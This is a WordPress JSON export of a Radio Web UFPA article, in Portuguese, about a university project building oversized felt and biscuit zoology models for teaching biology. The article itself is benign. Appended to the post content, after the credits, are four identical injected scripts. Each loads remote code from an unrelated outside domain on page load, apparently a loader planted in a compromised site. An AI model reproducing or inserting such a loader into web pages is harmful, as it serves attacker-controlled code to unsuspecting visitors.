{"id":11182,"date":"2022-09-30T16:39:54","date_gmt":"2022-09-30T19:39:54","guid":{"rendered":"https:\/\/radio.ufpa.br\/?p=11182"},"modified":"2025-10-21T13:11:13","modified_gmt":"2025-10-21T16:11:13","slug":"colecao-didatica-de-zoologia","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/","title":{"rendered":"Cole\u00e7\u00e3o did\u00e1tica de zoologia"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/UFPA-ENSINO-COLECAO-DIDATICA-DE-ZOOLOGIA-28.09.22.mp3'>UFPA Ensino - Cole\u00e7\u00e3o did\u00e1tica de zoologia<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2022\\\/09\\\/UFPA-ENSINO-COLECAO-DIDATICA-DE-ZOOLOGIA-28.09.22.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"UFPA Ensino - Cole\\u00e7\\u00e3o did\\u00e1tica de zoologia\",\"caption\":\"\",\"description\":\"\\\"UFPA ENSINO - COLE\\u00c7\\u00c3O DID\\u00c1TICA DE ZOOLOGIA - 28.09.22\\\". G\\u00eanero: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"UFPA Ensino\",\"genre\":\"Other\",\"length_formatted\":\"28:19\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n\n\n<p>A cole\u00e7\u00e3o did\u00e1tica de zoologia \u00e9 a pauta desta edi\u00e7\u00e3o do UFPA Ensino. O projeto denominado \u201cOrganiza\u00e7\u00e3o da cole\u00e7\u00e3o did\u00e1tica de zoologia para melhoria do ensino e aprendizagem ativa em Biologia\u201d \u00e9 coordenado pela professora Roberta de Melo Valente, do Instituto de Ci\u00eancias Biol\u00f3gicas da UFPA. No bate-papo, com a jornalista Elissandra Batista, a professora Roberta destaca a import\u00e2ncia da cole\u00e7\u00e3o na aprendizagem dos estudantes e os desafios no processo de curadoria.<\/p>\n\n\n\n<p>A organiza\u00e7\u00e3o da cole\u00e7\u00e3o did\u00e1tica de zoologia se mostrou necess\u00e1ria assim que a professora Roberta come\u00e7ou a dar aulas na Universidade. Segundo ela, n\u00e3o havia animais dispon\u00edveis para as aulas pr\u00e1ticas da disciplina, e, como os animais precisam ser manipulados e dissecados, tamb\u00e9m era invi\u00e1vel emprest\u00e1-los de outras cole\u00e7\u00f5es. Em 2019, o projeto foi submetido ao Labinfra da UFPA. Com os recursos do edital, hoje a iniciativa atende aos padr\u00f5es internacionais de cole\u00e7\u00f5es did\u00e1ticas.<\/p>\n\n\n\n<p>Ap\u00f3s a melhoria da infraestrutura, o ensino ativo da Biologia foi o pr\u00f3ximo passo a ser aprimorado. Para isso, os modelos did\u00e1ticos come\u00e7aram a ser constru\u00eddos. Eles surgiram porque os animais s\u00e3o danificados durante os estudos, e a reposi\u00e7\u00e3o \u00e9 dif\u00edcil j\u00e1 que exige a coleta na natureza. Os modelos consistem em animais superdimensionados e em 3D, que s\u00e3o coloridos para enfatizar as caracter\u00edsticas diagn\u00f3sticas de cada um. <\/p>\n\n\n\n<p>\u201cIsso impulsionou o ensino e a aprendizagem, porque um animal que eu tinha que dizer \u2018olha a\u00ed no microsc\u00f3pio, ele tem essa pecinha branca\u2019, eu mostro hoje no modelo. Ent\u00e3o, o aluno v\u00ea no modelo e v\u00ea no animal. Continua, de fato, tendo a pr\u00e1tica do estudo no animal, no microsc\u00f3pio, mas ele tem o modelo para auxiliar\u201d, comenta Roberta.<\/p>\n\n\n\n<p>Os modelos did\u00e1ticos s\u00e3o criados pelos estudantes de Biologia, como mais uma forma de desenvolver a aprendizagem ativa. A partir de fotos 3D, da disseca\u00e7\u00e3o dos animais e dos conceitos aprendidos em sala, os alunos montam os modelos, sob a supervis\u00e3o da professora. As pe\u00e7as da cole\u00e7\u00e3o s\u00e3o produzidas em feltro &#8211; pel\u00facia &#8211; e em massa de biscuit. <\/p>\n\n\n\n<p>Os modelos de feltro s\u00e3o coloridos de forma a evidenciar as caracter\u00edsticas diagn\u00f3sticas e a pel\u00facia foi inserida para \u201cquebrar a imagem de nojo que as pessoas t\u00eam dos animais\u201d, destaca a professora. As pe\u00e7as moldadas em biscuit s\u00e3o mais parecidas com o animal real, em cores e formatos. Al\u00e9m disso, todos os modelos did\u00e1ticos acompanham as fases do desenvolvimento dos animais &#8211; da larva ao adulto, por exemplo.<\/p>\n\n\n\n<p>Extrapolando as salas de aula e laborat\u00f3rios do Instituto de Ci\u00eancias Biol\u00f3gicas, a cole\u00e7\u00e3o did\u00e1tica de zoologia j\u00e1 foi utilizada em uma escola do munic\u00edpio de Barcarena, com uma turma da Educa\u00e7\u00e3o para Jovens e Adultos, EJA. A professora Roberta conta que a cole\u00e7\u00e3o foi muito bem recebida pelos alunos, que participaram ativamente das discuss\u00f5es e se impressionaram, sobretudo, com os modelos superdimensionados. <\/p>\n\n\n\n<p>Para a professora, o retorno dos estudantes \u00e9 gratificante: \u201cVoc\u00ea percebe nos suspiros, nos olhares, com os alunos dizendo que entenderam. (&#8230;) Imagina poder tocar em uma pe\u00e7a que, de 1 mil\u00edmetro, foi transformada para 30 cent\u00edmetros? Ent\u00e3o, muda totalmente a aprendizagem ativa.\u201d<\/p>\n\n\n\n<p>Al\u00e9m do projeto da cole\u00e7\u00e3o, a professora est\u00e1 desenvolvendo um aplicativo em conjunto com os discentes, para identifica\u00e7\u00e3o de insetos. O app disp\u00f5e de um acervo com informa\u00e7\u00f5es sobre eles, assim como mostra as fases do desenvolvimento de cada um. Roberta Valente reitera que o app e a cole\u00e7\u00e3o did\u00e1tica, em conjunto, abrangem o trip\u00e9 ensino, pesquisa e extens\u00e3o na zoologia.<\/p>\n\n\n\n<p>Para conhecer mais sobre a organiza\u00e7\u00e3o da cole\u00e7\u00e3o did\u00e1tica de zoologia para melhoria do ensino e aprendizagem ativa em Biologia, n\u00e3o perca a \u00edntegra do programa UFPA Ensino, que vai ao ar toda quarta-feira, \u00e0s 11h, com reprise \u00e0s sextas-feiras, \u00e0s 20h.<\/p>\n\n\n\n<p>Apresenta\u00e7\u00e3o: Elissandra Batista<\/p>\n\n\n\n<p>Produ\u00e7\u00e3o, roteiro e reportagem: Giovanna Martini<\/p>\n\n\n\n<p>Grava\u00e7\u00e3o e montagem: Jo\u00e3o Nilo<\/p>\n\n\n\n<p>Imagem: Acervo do projeto<\/p>\n\n\n\n<p> <\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Cole\u00e7\u00e3o did\u00e1tica de zoologia\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/\" aria-label=\"Read more about Cole\u00e7\u00e3o did\u00e1tica de zoologia\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":11185,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[41],"tags":[],"class_list":["post-11182","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-ensino"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Cole\u00e7\u00e3o did\u00e1tica de zoologia - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"A cole\u00e7\u00e3o did\u00e1tica de zoologia \u00e9 tema do UFPA Ensino, que destaca a import\u00e2ncia da cole\u00e7\u00e3o na aprendizagem dos estudantes de Biologia.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cole\u00e7\u00e3o did\u00e1tica de zoologia - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"A cole\u00e7\u00e3o did\u00e1tica de zoologia \u00e9 tema do UFPA Ensino, que destaca a import\u00e2ncia da cole\u00e7\u00e3o na aprendizagem dos estudantes de Biologia.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2022-09-30T19:39:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:11:13+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1620\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Cole\u00e7\u00e3o did\u00e1tica de zoologia\",\"datePublished\":\"2022-09-30T19:39:54+00:00\",\"dateModified\":\"2025-10-21T16:11:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/\"},\"wordCount\":715,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1\",\"articleSection\":[\"UFPA Ensino\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/\",\"name\":\"Cole\u00e7\u00e3o did\u00e1tica de zoologia - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1\",\"datePublished\":\"2022-09-30T19:39:54+00:00\",\"dateModified\":\"2025-10-21T16:11:13+00:00\",\"description\":\"A cole\u00e7\u00e3o did\u00e1tica de zoologia \u00e9 tema do UFPA Ensino, que destaca a import\u00e2ncia da cole\u00e7\u00e3o na aprendizagem dos estudantes de Biologia.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1\",\"width\":1620,\"height\":1080,\"caption\":\"Cole\u00e7\u00e3o did\u00e1tica de zoologia\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cole\u00e7\u00e3o did\u00e1tica de zoologia\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cole\u00e7\u00e3o did\u00e1tica de zoologia - Radio Web UFPA","description":"A cole\u00e7\u00e3o did\u00e1tica de zoologia \u00e9 tema do UFPA Ensino, que destaca a import\u00e2ncia da cole\u00e7\u00e3o na aprendizagem dos estudantes de Biologia.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/","og_locale":"pt_BR","og_type":"article","og_title":"Cole\u00e7\u00e3o did\u00e1tica de zoologia - Radio Web UFPA","og_description":"A cole\u00e7\u00e3o did\u00e1tica de zoologia \u00e9 tema do UFPA Ensino, que destaca a import\u00e2ncia da cole\u00e7\u00e3o na aprendizagem dos estudantes de Biologia.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2022-09-30T19:39:54+00:00","article_modified_time":"2025-10-21T16:11:13+00:00","og_image":[{"width":1620,"height":1080,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1","type":"image\/png"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Cole\u00e7\u00e3o did\u00e1tica de zoologia","datePublished":"2022-09-30T19:39:54+00:00","dateModified":"2025-10-21T16:11:13+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/"},"wordCount":715,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1","articleSection":["UFPA Ensino"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/","name":"Cole\u00e7\u00e3o did\u00e1tica de zoologia - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1","datePublished":"2022-09-30T19:39:54+00:00","dateModified":"2025-10-21T16:11:13+00:00","description":"A cole\u00e7\u00e3o did\u00e1tica de zoologia \u00e9 tema do UFPA Ensino, que destaca a import\u00e2ncia da cole\u00e7\u00e3o na aprendizagem dos estudantes de Biologia.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1","width":1620,"height":1080,"caption":"Cole\u00e7\u00e3o did\u00e1tica de zoologia"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/colecao-didatica-de-zoologia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Cole\u00e7\u00e3o did\u00e1tica de zoologia"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/09\/colecao-didatica.png?fit=1620%2C1080&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2Um","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/11182","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=11182"}],"version-history":[{"count":8,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/11182\/revisions"}],"predecessor-version":[{"id":17851,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/11182\/revisions\/17851"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/11185"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=11182"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=11182"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=11182"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}